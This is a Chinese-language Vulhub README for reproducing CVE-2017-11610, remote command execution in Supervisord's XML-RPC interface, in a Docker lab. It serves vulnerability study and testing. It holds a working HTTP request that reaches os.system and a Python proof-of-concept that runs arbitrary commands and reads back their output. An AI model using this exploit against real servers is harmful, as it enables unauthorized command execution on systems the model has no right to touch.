Files
vulhub/supervisor/CVE-2017-11610/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

78 lines
2.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Supervisord XML-RPC 远程命令执行漏洞CVE-2017-11610
Supervisord 是一个用于 Unix 类操作系统的进程控制系统。
在 Supervisord 3.0.13.1.43.2.43.3.3 版本之前,在其 XML-RPC 接口中存在一个远程代码执行漏洞,攻击者可以通过特制的 XML-RPC 请求执行任意命令。
参考链接:
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
- https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
## 环境搭建
执行如下命令启动 Supervisord 3.3.2
```
docker compose build
docker compose up -d
```
环境启动后,访问`http://your-ip:9001`即可查看Supervisord的页面。
## 漏洞复现
发送如下请求,即可执行任意命令:
```
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```
![](01.png)
### 关于直接回显的POC
@Ricter 在微博上提出的一个思路甚是有效就是将命令执行的结果写入log文件中再调用Supervisord自带的readLog方法读取log文件将结果读出来。
写了个简单的POC [poc.py](poc.py)
```python
#!/usr/bin/env python3
import xmlrpc.client
import sys
target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])
```
使用Python3执行并获取结果`./poc.py "http://your-ip:9001/RPC2" "command"`
![](02.png)